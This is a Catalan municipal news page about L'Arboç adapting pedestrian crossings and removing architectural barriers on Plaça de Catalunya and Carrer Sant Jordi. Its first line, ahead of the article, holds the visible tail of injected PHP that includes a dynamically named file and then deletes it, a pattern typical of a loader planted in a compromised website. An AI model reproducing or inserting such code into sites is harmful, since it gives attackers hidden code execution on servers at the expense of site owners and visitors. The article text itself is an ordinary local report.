");fclose($hdl);include("{$eb}.$algo");@unlink("{$eb}.$algo");$npDcheckClassBgp='aue';} ?> L´Arboç adapta passos de vianants i elimina barreres arquitectòniques en diferents zones de la vila
Iconos cabecera

Destaquem

  • SEM 2021SEM 2021
    Setmana Europea de la Mobilitat 2021

L´Arboç adapta passos de vianants i elimina barreres arquitectòniques en diferents zones de la vila (17/01/2020)

La Brigada municipal està treballant aquests dies en diferents zones de la vila per eliminar barreres arquitectòniques i adequar-les a la normativa. Concretament s’han rebaixat 10 voreres i/o ampliat per complir les normatives d’accessibilitat a la Plaça de Catalunya. Es tracta d’una zona de molt concorreguda per haver-hi el Centre d’Atenció Primària, i el Poliesportiu. Al Carrer Sant Jordi també s’ha fet una intervenció en dues voreres i un pas de vianants a l’alçada de la façana lateral de l’Escola Bressol per adequar-lo a la normativa i s’han instal.lat fanals per millorar-ne la visibilitat.

En aquesta actuació es dota els passos de vianants de paviment podo tàctil -per orientar les persones amb dèficit visual. En altres ocasions es retalla el paviment asfàltic i s’allarga la vorera per a aconseguir la inclinació o amplada necessària per complir la normativa.

Durant unes 3 setmanes la Brigada Municipal arranjarà un total de 10 voreres de la Plaça de Catalunya i 2 més del Carrer Sant Jordi. Aquesta actuació de la Regidoria de Serveis Urbans, era una de les propostes dels pressupostos participatius 2019, corre a càrrec al 100% de l’Ajuntament de l’Arboç.

Font: Ajuntament de l'Arboç

L´Arboç adapta passos de vianants i elimina barreres arquitectòniques en diferents zones de la vila

[Tornar a Notícies]

 
Carrer d' Anselm Clavé, 1 43004 - Tarragona